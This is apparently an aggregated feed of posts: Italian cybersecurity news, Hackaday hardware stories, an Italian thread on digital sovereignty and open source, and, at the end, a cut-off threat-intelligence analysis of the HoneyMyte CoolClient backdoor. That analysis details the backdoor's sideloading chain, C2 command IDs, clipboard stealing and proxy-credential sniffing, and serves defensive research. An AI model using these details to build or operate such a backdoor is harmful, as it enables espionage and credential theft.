VApache Hadoop a rischio: una falla di memoria può mandare in crash i Big Data
📌 Link all'articolo : redhotcyber.com/post/vapache-h…
Un #aggiornamento di #sicurezza è stato rilasciato dalla Apache Software Foundation per Apache Hadoop, elemento fondamentale nell’elaborazione dei #bigdata per le aziende a livello globale. La #vulnerabilità, identificata con il #codice CVE-2025-27821, è stata rilevata nel client nativo HDFS e potrebbe causare crash di #sistema o danneggiamento dei #dati a causa di una #gestione non #appropriata della #memoria, mettendo così i #sistemi a #rischio.
A cura di Agostino Pellegrino
#redhotcyber #news #apache #hadoop #sicurezza #cybersecurity #vulnerabilita #aggiornamentodisicurezza #hdfs #protezionedatidanni #prevenzione #sisteminformatici #criticità #informatica
VApache Hadoop a rischio: una falla di memoria può mandare in crash i Big Data
Scoperta vulnerabilità CVE-2025-27821 in Apache Hadoop, il client nativo HDFS espone i sistemi a crash o danneggiamento dati.Agostino Pellegrino (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
How HP Calculators Communicate Over Infrared
For most people, calculators are cheap and simple devices used for little more than addition and the odd multiplication job. However, when you get into scientific and graphical calculators, the feature sets get a lot more interesting. For example, [Ready? Z80] has this excellent explainer on how HP’s older calculators handle infrared communications.
The video focuses on the HP 27S Scientific Calculator, which [Ready? Z80] found in an op-shop for just $5. Introduced in 1988, the HP-27S had the ability to dump screen data over an infrared link to a thermal printer to produce paper records of mundane high-school calculations or important engineering math. In the video, [Ready? Z80] explains the communication method with the aid of Hewlett-Packard’s own journal publication from October 1987, which lays out of the details of “the REDEYE Protocol.” Edgy stuff. It’s pretty straightforward to understand, with the calculator sending out bursts of data in six to eight pulses at a time, modulated onto a 32.768KHz square wave as is the norm. [Ready? Z80] then goes a step further, whipping up custom hardware to receive the signal and display the resulting data on a serial terminal. This is achieved with a TEC-1G single-board computer, based on the Z80 CPU, because that’s how [Ready? Z80] does things.
We’ve seen other great stuff from this channel before, too. For example, if you’ve ever wanted to multitask on the Z80, it’s entirely possible with the right techniques. Video after the break.
youtube.com/embed/FYOFi1Atyg0?…
Smoothie Bikes Turned Into Game Controllers
Smoothie bikes are a great way to make a nutritious beverage while getting a workout at the same time. [Tony Goacher] was approached by a local college, though, which had a problem with this technology. Namely, that students were using them and leaving them filthy. They posed a simple question—could these bikes become something else?
[Tony’s] solution was simple—the bikes would be turned into game controllers. This was easily achieved by fitting a bi-color disc into the blender assembly. As the wheel on the bike turns, it spins up the blender, with the disc inside. An ESP32 microcontroller paired with a light sensor is then able to count pulses as the disc spins, getting a readout of the blender’s current RPM. Working backwards, this can then be calculated out into the bike’s simulated road speed and used to play a basic game on an attached Raspberry Pi. Notably, the rig is setup such that the Raspberry Pi and one bike connect to an access point hosted by the other bike. This is helpful, because it means neither bike has too many dangling cables that could get caught up in a wheel or chain.
We’ve seen many amusing game peripherals over the years, from salad spinners to turntables. Video after the break.
youtube.com/embed/tXwGMks4NyE?…
Servicing the ‘Not Serviceable’ Bearings on a Vacuum Power Head
Everyone knows that bearings are a consumable wear item, and that the power head of a vacuum likely contains bearings that will eventually need to be replaced. Yet when the manufacturer wants you to toss out the entire roller and pay $80 for the privilege, that feels rather steep and unnecessary. In the case of [Mark Furneaux], the roller in the power head of his Filter Queen brand vacuum felt particularly over the top to toss, since it’s all fancy wood with very durable brushes.
One of the bearings had stopped being a bearing, resulting in the plastic that held it in place beginning to melt. Fortunately the damage hadn’t progressed to the point where printing a replacement was necessary, so instead it was time to figure out how to remove the bearings without permanent damage. The trick that the manufacturer used was to peen the ends of the metal shafts that the bearings fit onto, requiring some Dremel action to convince them to come off.
After some careful modifications like this, the remnants of the old bearings came off and their replacements could go on. Due to the metal shaft modifications, it is now mostly the plastic caps on either end which grip the bearings, but it seems to work well enough. For $2 in bearings and some labor on [Mark]’s end, he managed to keep a perfectly good roller brush out of the landfill, and future bearing replacements should be much easier.
youtube.com/embed/oEJ6OIHEAjc?…
Post-rampocalyptic Chip-Swap Provides Desktop Memory at Laptop Prices
When you can buy something at a low price in one location, and sell it at a higher price somewhere else, you’re engaged in what economists call “arbitrage”. We’re not sure if desoldering DDR5 chips from laptop SO-DIMMs to populate a custom PCB to create much-more-expensive desktop memory counts as arbitrage, but it certainly counts as a hack. [VIK-on], who built the cards, claims he’s getting DDR5 performance at almost DDR3 prices. Nice!
Installed, the RAM apparently works well, though [VIK-on] has not shared benchmarks.Specifically, he’s put together a 32 GB UDIMM from donor chips from two 16 GB SO-DIMMs. The memory chips themselves aren’t enough to make a stick of RAM, however: the part where we wish we had more details was in the firmware. The firmware identifies this DIY DIMM as an ADATA AX5U6500C3232G-DCLARWH, specifically. [VIK-on] is still performing stability tests, if those go well, we’re told to expect a how-to guide.
[VIK-on] is in Russia, so SO-DIMM rates may differ in your local market, but he claims walkaway costs of 17,015 ₽ — about $218 or €188, an astounding price for DDR5 in these dark days.
Some say soldering SIMMs seems severe, but hardly strange to Hackaday, and desperate times call for desperate measures. It’s ether that or optimize software, and who wants go to that effort?
NEW: After Apple launched Lockdown Mode years ago, and Google released its own special security feature for Android last year, WhatsApp now offers a new mode for users at high risk of being targeted with spyware.
It's called Strict Account Settings and enables certain restrictions to protect users.
techcrunch.com/2026/01/27/what…
WhatsApp is rolling out a new stricter security setting to protect users from cyber attacts | TechCrunch
Days after Meta was sued by over alleged false privacy claims by its chat app WhatsApp, the company has rolled out a new setting to protect users againstIvan Mehta (TechCrunch)
Cybersecurity & cyberwarfare reshared this.
securityaffairs.com/187405/sec…
#securityaffairs #hacking
WhatsApp rolls out Strict Account settings to strengthen protection for high-risk users
Meta announced new Strict Account Settings on WhatsApp to better protect high-risk users from advanced cyber attacks.Pierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
Regrowing Teeth Might Not Be Science Fiction Anymore
The human body is remarkably good at handling repairs. Cut the skin, and the blood will clot over the wound and the healing process begins. Break a bone, and the body will knit it back together as long as you keep it still enough. But teeth? Our adult teeth get damaged all the time, and yet the body has almost no way to repair them at all. Get a bad enough cavity or knock one out, and it’s game over. There’s nothing to be done but replace it.
Finding a way to repair teeth without invasive procedures has long been a holy grail for dental science. A new treatment being developed in Japan could help replace missing teeth in the near future.
The Tooth
Using an antibody treatment to suppress USAG-1 in ferrets led to the development of supernumerary teeth. In regular speak, that means “more teeth than you would typically expect a ferret to have.” Credit: Research paper
In the course of normal development, humans grow a set of baby teeth, followed by a set of adult or “permanent” teeth. Conventional wisdom tells us that this second set is all we get, and that we should properly care for them if we hope to hang on to them for life. Physical injury can knock them out, and a lack of dental hygiene can see them badly damaged to the point where they have to be removed. Thus, there are plenty of incentives to take care of one’s teeth, given that there is little to be done beyond replacing them with clumsy dentures if they fail us.
Researchers in Japan may have figured out a workaround, however. A gene called uterine sensitization–associated gene-1 (USAG-1) was identified to play a role in stopping the growth of teeth in small mammals like mice and ferrets. In turn, it was determined that by inhibiting the interaction between proteins generated by USAG-1 and bone morphgenetic protein (BMP) molecules, it was possible to make dental growth resume. The perceived link is relatively simple—suppress USAG-1, and kickstart the tooth generation process. The hope is that using an antibody to do this would then lead to the spontaneous development of healthy adult teeth.
Research suggests that humans may have an extra set of teeth “buds” lurking in the jaw that normally lay dormant; it could be as simple as activating them to produce new teeth as needed. Thus, the concept is sometimes referred to as growing “the third tooth”—in that a regenerated tooth would be the third tooth after the original baby and adult teeth. Particularly as human lifespans grow longer, the ability to produce a third set of teeth becomes more valuable. However, the technique won’t just be useful for people that break a tooth or lose one to excessive acid wear or associated damage. Indeed, an early focus of the work is to help individuals with conditions like congenital anodontia, wherein a patient never grew a full set of mature permanent teeth. The aim is that the treatment could stimulate the growth of strong, adult-grade teeth to improve the quality of life for those with the condition.It’s believed humans may have buds for a third set of teeth already lurking, just waiting to be activated. Credit: research paper
With early stage trials in mice completed some time ago, the treatment remains in early stage clinical trials for humans. An initial trial tested the treatment on adult males from 30 to 64 years old who were missing at least one tooth. This was with the hope that if growth did occur, it would ideally be limited to the missing slot, rather than causing new growth in areas that would push out existing healthy teeth. The next stage of trials will involve young children from ages 2 to 7 who are missing at least four teeth, to test the treatment on those with a congenital tooth deficiency. It’s likely that testing will also aim to determine just how USAG-1 suppression influences tooth regrowth. Ideally, it would only occur in specific areas where teeth were missing. It would be a great disaster if the treatment led to widespread tooth regrowth, which could cause crowding issues or loss of healthy teeth.
Right now, taking a pill or injection to regrow entire teeth seems like science fiction. However, if it does turn out that merely supressing some proteins is enough to get the body’s own tooth factory rolling again, it could be a game changer. There’s hope yet for all, except perhaps those that make their business in selling dentures.
Running DOOM on Earbuds
In 1993, DOOM was a great game to play if you had a 486 with a VGA monitor and nothing to do all weekend. In 2026, you can play it on a set of earbuds instead, if for some reason that’s something you’ve always dreamed of doing.
The project comes to us from [Arin Sarkisian], who figured out that the Pinebuds Pro had enough processing power to run one of the seminal FPS games from the 1990s. Inside these earbuds is a Cortex-M4F, which is set to run at 100 MHz. [Arin] figured out it could easily be cranked up to 300 MHz with low power mode switched off, which would come in handy for one main reason. See, the earbuds might be able to run the DOOM engine, but they don’t have a display.
Thus, [Arin] figured the easiest way to get the video data out would be via the Cortex-M4F’s serial UART running at 2.4 mbps. Running the game at a resolution of 320 x 200 at 3 frames per second would consume this entire bandwidth. However, all those extra clock cycles allow running an MJPEG compression algorithm that allow spitting out up to 18 frames per second. Much better!
All that was left to do was to figure out a control scheme. To that end, a web server is set up off-board that passes key presses to the buds and accepts and displays the MJPEG stream to the player. If you’re so inclined you can even play the game yourself on the project website, though you might just have to get in a queue. In the meantime, you can watch the Twitch stream of whoever else is playing at the time.
Files are on GitHub—both the earbud firmware and the web interface used to play the game. It was perhaps only a matter of time until we saw DOOM on earbuds; no surprise given that we’ve already seen it played on everything from receipt printers to cookware. No matter how cliche, we’re going to keep publishing interesting DOOM ports—so keep them coming to the tipsline.
Thanks to [alialiali] for the tip!
Caro @pixelfed@pixelfed.social @pixelfed@mastodon.social @pixelfed@mastodon.uno che smandruppato di senso ha offrire un servizio e togliere l'unica funzione che farà impazzire di gioia gli utenti che vogliono levarsi #Instagram dalle scatole?
La funzione Import non è disponibile.
Il supporto assente.
La richiesta di risposta dagli admin assente.
Cybersecurity & cyberwarfare reshared this.
uso .social e .ch.
Su .ch è attivo, su .social disabilitato.
È sperimentale? Dal 2024?
Meglio mettere una nota NELLA schermata di Import per ricordarlo.
Non che io debba sollevare polveroni perché nessuno su .social si degna di rispondere dopo mail e form in quantità industriale.
Zombie Netscape Won’t Die
The very concept of the web browser began with a humble piece of software called NCSA Mosaic, all the way back in 1993. It was soon eclipsed by Netscape Navigator, and later Internet Explorer, which became the titans of the 1990s browser market. In turn, they too would falter. Navigator’s dying corpse ended up feeding what would become Mozilla Firefox, and Internet Explorer later morphed into the unexceptional browser known as Edge.
Few of us have had any reason to think about Netscape Navigator since its demise in 2008. And yet, the name lingers on. A zombie from a forgotten age, risen again to haunt us today.
The Bigger They Are, The Harder They Fall
Netscape Navigator was once the browser to use, dominating its rivals with a 90% market share. Unfortunately, that reign of glory only lasted until the last few years of the 1990s, when Internet Explorer began to embrace, extend, and extinguish. Explorer was included with every copy of Windows sold, it was distributed by AOL and minor ISPs alike, and it was better at keeping up with, or outright creating, new standards at a time when Netscape’s developers became stuck in the quagmire of an an increasingly aging codebase.
Netscape was great right through the 4.0s, but Netscape 5 was cancelled, and Netscape 6 was a mess. The company was bought out by AOL, and the product limped on into the early 2000s, but it was eventually declared dead on March 1, 2008. With almost no user base to speak of at that point, it simply did not make sense to continue.
You might think, then, that the Netscape name died with the browser and that it would never be seen or heard again. Unfortunately, that’s almost never the case when it comes to recognizable names in the tech world. Somebody always seems to hang on to the rights to do something with them, even if it’s usually unsuccessful. Sometimes it goes well, but more often than not, it amounts to little more than a hackneyed old logo slapped on a product that nobody really cares about.Connect to the Internet by dialing up the Netscape ISP! Ironically founded several years after the browser ceased to be relevant at all. Credit: Netscape ISP via Web Archive
In the case of Netscape, the branding rights became AOL’s when it first purchased the business in 1998. It would go on to use the name to start a dial-up ISP in 2004, called Netscape Internet Service. It’s unclear precisely why this was done, given that AOL already was an ISP in its own right, which ran dial-up service all the way up until September 2025.
But for whatever reason, Netscape ISP kicked off operations on January 8, 2004, initially offering unlimited use for just $9.95 a month. Notably, it seems the name was the point—with the barebones site noting that you were getting a “reliable Internet connection from a name you trust.” It was also somewhat different from the contemporary AOL offering, in that you didn’t need a CD full of bloatware to access the service. The signup site went so far as to explain that you didn’t need to use a Netscape Navigator browser to access the service; any would do. As a cool bonus, you got a sweet “@netscape.com” email address when you signed up.Even in 2016, the Netscape ISP was still offering dial-up connections only. However, you could get additional netscape.com email addresses for an extra $2.00 a month, along with various other add-ons of questionable value. Credit: Netscape ISP via Web Archive
The Netscape ISP maintained its cheap offering for many years. It also later added “Web Accelerator,” which was a simple compression tool that promised to let you surf the web “up to 5x faster.” In reality, it was marketing fluff that did not make a lot of difference to dial-up users chugging along on slow connections. Weirdly, the Netscape ISP never transitioned over to selling DSL or fiber or any sort of modern broadband connection. As recently as 2018, you could still sign up for a service that was entirely dial-up only. Eventually, at some point in the late 2010s or early 2020s, Netscape ISP appeared to stop accepting new signups, with the main webpage (isp.netscape.com) eventually turning into a generic news aggregator. It remains in that state today at the time of writing.
Perhaps the most hilarious part of the Netscape ISP story, though, is that it eventually spawned its own browser. Somewhere deep in the bowels of an AOL office, some poor developer had to hack together a Chromium fork to slap the Netscape ISP branding on it. You can still download it today, thanks to a link lurking on the bottom of the Netscape ISP site. We gave it a look.The Netscape ISP page as it stands in 2026. This format has been used on the site since at least 2022; it appears the ISP stopped accepting new customers some years prior. Credit: isp.netscape.com
Hilariously, it’s an amalgamation of so many dying names from the early Internet—the privacy policy is hosted on Yahoo, because the now-defunct search engine merged with AOL in 2015. The browser is very obviously a reskinned version of Chromium from mid-2024, with a bit of AOL search bloatware thrown in for good measure.
While you can still download the silly 2024 “Netscape” browser, you can’t use the ISP anymore. That’s because AOL killed it dead in November 2025. Affected users will be able to maintain their super-cool netscape.com email addresses, but no more will you be able to dial up to access the Internet with your Netscape ISP account. To ease the change, AOL offered to transition affected users over to the “Complete by AOL” service, while also recommending alternatives like Starlink, HughesNet, Dialup4Less.com, and T-Mobile and Verizon 5G home internet plans. Yes, even in late 2025, your dying dial-up ISP was willing to recommend another that still operates on the old-fashioned phone lines, just as our ancestors intended.
One thing we’d love to see are the user statistics for the Netscape ISP over the past two decades. It’s hard to imagine there were a whole lot of people that were inconvenienced when AOL’s random off-shoot dial-up ISP went down in November 2025. It has to be some tiny figure, even less than the number of dial-up users that were still on the company’s main service, which shut down a month earlier. Still, they felt the need to issue a notice to users, so somebody must still have been calling in now and then, using their glacial 56K connection to check the weather and catch up on the latest updates in the Ivy League squash standings.
In any case, save for a tired old website and a rapidly-aging port of Chrome, Netscape is finally dead. For good this time. Until the logo turns up on a bunch of smart TVs and a badly-rebadged smartphone, or something. Until then, the big N shall hopefully be laid to rest.
Alessandro likes this.
Pi Compute Module Powers Fully Open Smartphone
With the powerful off-the-shelf hardware available to us common hardware hobbyist folk, how hard can it be to make a smartphone from scratch? Hence [V Electronics]’s Spirit smartphone project, with the video from a few months ago introducing the project.
As noted on the hardware overview page, everything about the project uses off the shelf parts and modules, except for the Raspberry Pi Compute Module 5 (CM5) carrier board. The LCD is a 5.5″, 1280×720 capacitive one currently, but this can be replaced with a compatible one later on, same as the camera and the CM5 board, with the latter swappable with any other CM5 or drop-in compatible solution.
The star of the show and the thing that puts the ‘phone’ in ‘smartphone’ is the Quectel EG25-GL LTE (4G) and GPS module which is also used in the still-not-very-open PinePhone. Although the design of the carrier board and the 3D printable enclosure are still somewhat in flux, the recent meeting notes show constant progress, raising the possibility that with perhaps some community effort this truly open hardware smartphone will become a reality.
youtube.com/embed/OgMdO0ckICg?…
Thanks to [tiel] for the tip.
Idiocracy is coming - Governo tramite intelligenza artificiale? L'amministrazione Trump prevede di redigere regolamenti utilizzando l'intelligenza artificiale
Il Dipartimento dei Trasporti, che sovrintende alla sicurezza di aerei, automobili e oleodotti, prevede di utilizzare Google Gemini per redigere nuove normative. "Non abbiamo bisogno della norma perfetta", dice il procuratore del Dipartimento dei Trasporti. "Vogliamo che sia sufficientemente buona".
propublica.org/article/trump-a…
Government by AI? Trump Administration Plans to Write Regulations Using Artificial Intelligence
The Transportation Department, which oversees the safety of airplanes, cars and pipelines, plans to use Google Gemini to draft new regulations. “We don’t need the perfect rule,” said DOT’s top lawyer. “We want good enough.”Alex.Bandoni@propublica.org (ProPublica)
reshared this
Tenendo presente che le AI usate da avvocati frettolosi, sono state pizzicate dai giudici a inventarsi riferimenti a casi inesistenti, secondo me ci sarà da ridere (o piangere).
@informapirata @aitech
La Francia abbandonerà le piattaforme statunitensi Microsoft Teams e Zoom per una "piattaforma sovrana" a causa di problemi di sicurezza
La Francia sostituirà le piattaforme americane Microsoft Teams e Zoom con una propria piattaforma di videoconferenza sviluppata a livello nazionale, che sarà utilizzata in tutti i dipartimenti governativi entro il 2027, ha annunciato lunedì il Paese.
euronews.com/next/2026/01/27/f…
France to ditch US platforms Microsoft Teams, Zoom for ‘sovereign platform’ amid security concerns
France announced that it will roll out the Visio platform across all government departments by 2027.Pascale Davies (Euronews.com)
like this
reshared this
@redflegias il problema degli sviluppatori, in tempi di servitù digitale, è che la selezione lavorativa è avvenuta sui profili più adatti a gestire le piattaforme USA. L'inversione di tendenza sarà l'aspetto più difficile e costoso, ma costituirà un investimento utile e irrinunciabile per il futuro
informapirata ⁂ reshared this.
informapirata ⁂ reshared this.
reshared this
Informatica (Italy e non Italy) reshared this.
reshared this
se non c’è nessuno che te lo paga, non si inizia. Prova tu a raccogliere soldi in italia (sia lato burocratico, sia lato “chi te li da”). Sviluppatori open italiani importanti ci sono, ma contribuiscono a progetti esteri.
Eppure non sarebbe neanche troppo difficile: "sgravi fiscali e/o contributi statali o europei [qualcuno ha detto PNRR] ma solo se sviluppi software Open Source".
Fine.
Il punto, temo, è che alla base manca la cultura per capirne il valore, e questa assenza di cultura è poi quella che fa dire al mega-manager "mi metto con Micro$oft, così non mi lascerà mai a piedi, e poi a conti fatti costa anche meno, non devo avere sviluppatori in casa".
Ho conosciuto dirigenti che in cambio di un costo fisso e certo, imputabile alle passività (=servizi) sarebbero capaci di ipotecare persino la madre.
In sostanza, il FOSS viene percepito con zero valore e il software proprietario la soluzione a qualsiasi cosa, poco importa se non è nemmeno del nostro continente.
Finche non ribaltiamo questa frittata mentale, vedo poco futuro.
@ilsimoneviaggiatore @redflegias ahaha grasse risate 😂😂 se la mafia non tocca palla, qui non si muove una foglia. E per fare software open non servono gru e betoniere. (Sarebbe bello però)
Lato aziendale invece: quello è un problema, e oltre a quello l'utente medio. Nel 90% dei casi excel/word può benissimo essere rimpiazzato. Non parlo di chi usa macro o fa analisi finanziarie. Però appena lo proponi, sai bene cosa succede e come si scaldano gli animi solo perché cambi un icona a un pulsante.
È proprio cosi, in altri post facevo vari esempi.
Io sono sopravvissuto benissimo per 4 anni con Libre Office, pur facendo sistemista e Project Manager.
C'erano alcune funzioni in cui era un po' farraginoso, ma per altri versi era più snello.
Ci ho gestito alcuni fogli xla di log da 1 milione di record in ogni tab, quando Excel 2016 non li apriva neanche. Per dire.
Per il resto Teams domina per le riunioni interne
reshared this
@mtorchiano grazie per la precisazione. Questo dimostra che è sempre faticoso perseguire un obiettivo 100% software libero, ma mostra anche che il problema non è solo tecnico, ma è soprattutto legato a quanto sia possibile scalfire le policies interne
Informatica (Italy e non Italy) reshared this.
@Suoko
L’aspetto dirimente è (per questo caso) riuscire a mantenere un’infrastruttura interna, il che non richiede solo hw e sw (€) ma anche human-ware. Che nella PA puoi assumere solo in corrispondenza di congiunzioni astrali e con stipendi poco attrattivi.
L’alternativa per le università è appoggiarsi a Cineca che ha una QoS non eccellente e non consente un buon controllo su feature ed evoluzione
reshared this
> anche human-ware. Che nella PA puoi assumere solo
Sì ma la scelta di sistema non è assumere nella PA gli informatici, ma far lavorare per la PA quei fornitori che si avvalgono di veri informatici e non quelle aziende che chiamo "configuratori certificati di cloud USA".
Queste aziende possono avvalersi di personale meno qualificato perché il know-how è tutto statunitense e in tal modo alterano il mercato del lavoro
Informatica (Italy e non Italy) reshared this.
Si, buona parte del lavoro può essere svolto da veri informatici.
Ma se non mantieni la conoscenza in casa sei fregato
reshared this
reshared this
sì mi ricordo che da studente era tutto sui loro server e quando ci sono tornato da ricercatore era tutto MS e ci sono rimasto malissimo
reshared this
valigiablu.it/sovranita-tecnol…
Software libero e infrastrutture: come l’UE sta provando a costruire un’alternativa a Google e Microsoft e a
L'Europa accelera sulla sovranità tecnologica per ridurre la dipendenza dalle Big Tech USA. Dai software open source al cloud sovrano: ecco i piani per l'UE.Valigia Blu
reshared this
Informatica (Italy e non Italy) reshared this.
Allarme truffe, nuove campagne di phishing SPID: analisi delle tecniche e dei rischi
@Informatica (Italy e non Italy 😁)
Il CERT-AgID ha individuato una nuova campagna di phishing ai danni dell’Agenzia delle Entrate finalizzata non solo ad acquisire le credenziali di accesso delle identità digitali SPID degli utenti, ma anche a impersonare la vittima in
Attenzione ai gruppi WhatsApp: Un’immagine può compromettere lo smartphone
📌 Link all'articolo : redhotcyber.com/post/attenzion…
#redhotcyber #news #cybersecurity #hacking #malware #vulnerabilita #whatsapp #android #googoprojectzero
Attenzione ai gruppi WhatsApp: Un'immagine può compromettere lo smartphone
WhatsApp sotto attacco: vulnerabilità critica e pressioni legali minano la sicurezza dell'appRedazione RHC (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
securityaffairs.com/187394/hac…
#securityaffairs #hacking
Shadowserver finds 6,000+ likely vulnerable SmarterMail servers exposed online
Shadowserver researchers found 6,000+ SmarterMail servers exposed online and likely vulnerable to a critical auth bypass flaw.Pierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
Sicurezza di Rete e Sistemi: guida alla protezione dell’infrastruttura IT
📌 Link all'articolo : redhotcyber.com/post/sicurezza…
#redhotcyber #news #sicurezzadirete #cybersecurity #minacceavanzate #protezionedati #sicurezzainformatica
Sicurezza di Rete e Sistemi: guida alla protezione dell'infrastruttura IT
Scopri come proteggere la tua infrastruttura IT dalle minacce moderne con strategie di sicurezza avanzate e best practice.Redazione RHC (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
securityaffairs.com/187375/sec…
#securityaffairs #hacking
U.S. CISA adds Microsoft Office, GNU InetUtils, SmarterTools SmarterMail, and Linux Kernel flaws to its Known Exploited Vulnerabilities catalog
U.S. CISA adds Microsoft Office, GNU InetUtils, SmarterTools SmarterMail, and Linux flaws to its Known Exploited Vulnerabilities catalogPierluigi Paganini (Security Affairs)
Cybersecurity & cyberwarfare reshared this.
Linux: Scoperto un bug “fantasma” nel Kernel che si nascondeva dal 2020!
📌 Link all'articolo : redhotcyber.com/post/linux-sco…
#redhotcyber #news #cybersecurity #hacking #linux #kernel #vulnerabilita #sicurezza #erroripagina #x86
Linux: Scoperto un bug "fantasma" nel Kernel che si nascondeva dal 2020!
Scoperta una vulnerabilità critica nel kernel Linux che potrebbe causare problemi di sicurezza. Ecco cosa sapere sulla falla e come è stata risolta.Redazione RHC (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns
Over the past few years, we’ve been observing and monitoring the espionage activities of HoneyMyte (aka Mustang Panda or Bronze President) within Asia and Europe, with the Southeast Asia region being the most affected. The primary targets of most of the group’s campaigns were government entities.
As an APT group, HoneyMyte uses a variety of sophisticated tools to achieve its goals. These tools include ToneShell, PlugX, Qreverse and CoolClient backdoors, Tonedisk and SnakeDisk USB worms, among others. In 2025, we observed HoneyMyte updating its toolset by enhancing the CoolClient backdoor with new features, deploying several variants of a browser login data stealer, and using multiple scripts designed for data theft and reconnaissance.
Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. If you are interested, please contact intelreports@kaspersky.com.
CoolClient backdoor
An early version of the CoolClient backdoor was first discovered by Sophos in 2022, and TrendMicro later documented an updated version in 2023. Fast forward to our recent investigations, we found that CoolClient has evolved quite a bit, and the developers have added several new features to the backdoor. This updated version has been observed in multiple campaigns across Myanmar, Mongolia, Malaysia and Russia where it was often deployed as a secondary backdoor in addition to PlugX and LuminousMoth infections.
In our observations, CoolClient was typically delivered alongside encrypted loader files containing encrypted configuration data, shellcode, and in-memory next-stage DLL modules. These modules relied on DLL sideloading as their primary execution method, which required a legitimate signed executable to load a malicious DLL. Between 2021 and 2025, the threat actor abused signed binaries from various software products, including BitDefender, VLC Media Player, Ulead PhotoImpact, and several Sangfor solutions.
Variants of CoolClient abusing different software for DLL sideloading (2021–2025)
The latest CoolClient version analyzed in this article abuses legitimate software developed by Sangfor. Below, you can find an overview of how it operates. It is worth noting that its behavior remains consistent across all variants, except for differences in the final-stage features.
Overview of CoolClient execution flow
However, it is worth noting that in another recent campaign involving this malware in Pakistan and Myanmar, we observed that HoneyMyte has introduced a newer variant of CoolClient that drops and executes a previously unseen rootkit. A separate report will be published in the future that covers the technical analysis and findings related to this CoolClient variant and the associated rootkit.
CoolClient functionalities
In terms of functionality, CoolClient collects detailed system and user information. This includes the computer name, operating system version, total physical memory (RAM), network details (MAC and IP addresses), logged-in user information, and descriptions and versions of loaded driver modules. Furthermore, both old and new variants of CoolClient support file upload to the C2, file deletion, keylogging, TCP tunneling, reverse proxy listening, and plugin staging/execution for running additional in-memory modules. These features are still present in the latest versions, alongside newly added functionalities.
In this latest variant, CoolClient relies on several important files to function properly:
| Filename | Description |
| Sang.exe | Legitimate Sangfor application abused for DLL sideloading. |
| libngs.dll | Malicious DLL used to decrypt loader.dat and execute shellcode. |
| loader.dat | Encrypted file containing shellcode and a second-stage DLL. Parameter checker and process injection activity reside here. |
| time.dat | Encrypted configuration file. |
| main.dat | Encrypted file containing shellcode and a third-stage DLL. The core functionality resides here. |
Parameter modes in second-stage DLL
CoolClient typically requires three parameters to function properly. These parameters determine which actions the malware is supposed to perform. The following parameters are supported.
| Parameter | Actions |
| No parameter | · CoolClient will launch a new process of itself with the install parameter. For example: Sang.exe install. |
| install |
|
| work |
|
| passuac |
|
Final stage DLL
The write.exe process decrypts and launches the main.dat file, which contains the third (final) stage DLL. CoolClient’s core features are implemented in this DLL. When launched, it first checks whether the keylogger, clipboard stealer, and HTTP proxy credential sniffer are enabled. If they are, CoolClient creates a new thread for each specific functionality. It is worth noting that the clipboard stealer and HTTP proxy credential sniffer are new features that weren’t present in older versions.
Clipboard and active windows monitor
A new feature introduced in CoolClient is clipboard monitoring, which leverages functions that are typically abused by clipboard stealers, such as GetClipboardData and GetWindowTextW, to capture clipboard information.
CoolClient also retrieves the window title, process ID and current timestamp of the user’s active window using the GetWindowTextW API. This information enables the attackers to monitor user behavior, identify which applications are in use, and determine the context of data copied at a given moment.
The clipboard contents and active window information are encrypted using a simple XOR operation with the byte key 0xAC, and then written to a file located at C:\ProgramData\AppxProvisioning.xml.
HTTP proxy credential sniffer
Another notable new functionality is CoolClient’s ability to extract HTTP proxy credentials from the host’s HTTP traffic packets. To do so, the malware creates dedicated threads to intercept and parse raw network traffic on each local IP address. Once it is able to intercept and parse the traffic, CoolClient starts extracting proxy authentication credentials from HTTP traffic intercepted by the malware’s packet sniffer.
The function operates by analyzing the raw TCP payload to locate the Proxy-Connection header and ensure the packet is relevant. It then looks for the Proxy-Authorization: Basic header, extracts and decodes the Base64-encoded credential and saves it in memory to be sent later to the C2.
Function used to find and extract Base64-encoded credentials from HTTP proxy-authorization headers
C2 command handler
The latest CoolClient variant uses TCP as the main C2 communication protocol by default, but it also has the option to use UDP, similar to the previous variant. Each incoming payload begins with a four-byte magic value to identify the command family. However, if the command is related to downloading and running a plugin, this value is absent. If the client receives a packet without a recognized magic value, it switches to plugin mode (mechanism used to receive and execute plugin modules in memory) for command processing.
| Magic value | Command category |
| CC BB AA FF | Beaconing, status update, configuration. |
| CD BB AA FF | Operational commands such as tunnelling, keylogging and file operations. |
| No magic value | Receive and execute plugin module in memory. |
0xFFAABBCC – Beacon and configuration commands
Below is the command menu to manage client status and beaconing:
| Command ID | Action |
| 0x0 | Send beacon connection |
| 0x1 | Update beacon timestamp |
| 0x2 | Enumerate active user sessions |
| 0x3 | Handle incoming C2 command |
0xFFAABBCD – Operational commands
This command group implements functionalities such as data theft, proxy setup, and file manipulation. The following is a breakdown of known subcommands:
| Command ID | Action |
| 0x0 | Set up reverse tunnel connection |
| 0x1 | Send data through tunnel |
| 0x2 | Close tunnel connection |
| 0x3 | Set up reverse proxy |
| 0x4 | Shut down a specific socket |
| 0x6 | List files in a directory |
| 0x7 | Delete file |
| 0x8 | Set up keylogger |
| 0x9 | Terminate keylogger thread |
| 0xA | Get clipboard data |
| 0xB | Install clipboard and active windows monitor |
| 0xC | Turn off clipboard and active windows monitor |
| 0xD | Read and send file |
| 0xE | Delete file |
CoolClient plugins
CoolClient supports multiple plugins, each dedicated to a specific functionality. Our recent findings indicate that the HoneyMyte group actively used CoolClient in campaigns targeting Mongolia, where the attackers pushed and executed a plugin named FileMgrS.dll through the C2 channel for file management operations.
Further sample hunting in our telemetry revealed two additional plugins: one providing remote shell capability (RemoteShellS.dll), and another focused on service management (ServiceMgrS.dll).
ServiceMgrS.dll – Service management plugin
This plugin is used to manage services on the victim host. It can enumerate all services, create new services, and even delete existing ones. The following table lists the command IDs and their respective actions.
| Command ID | Action |
| 0x0 | Enumerate services |
| 0x1 / 0x4 | Start or resume service |
| 0x2 | Stop service |
| 0x3 | Pause service |
| 0x5 | Create service |
| 0x6 | Delete service |
| 0x7 | Set service to start automatically at boot |
| 0x8 | Set service to be launched manually |
| 0x9 | Set service to disabled |
FileMgrS.dll – File management plugin
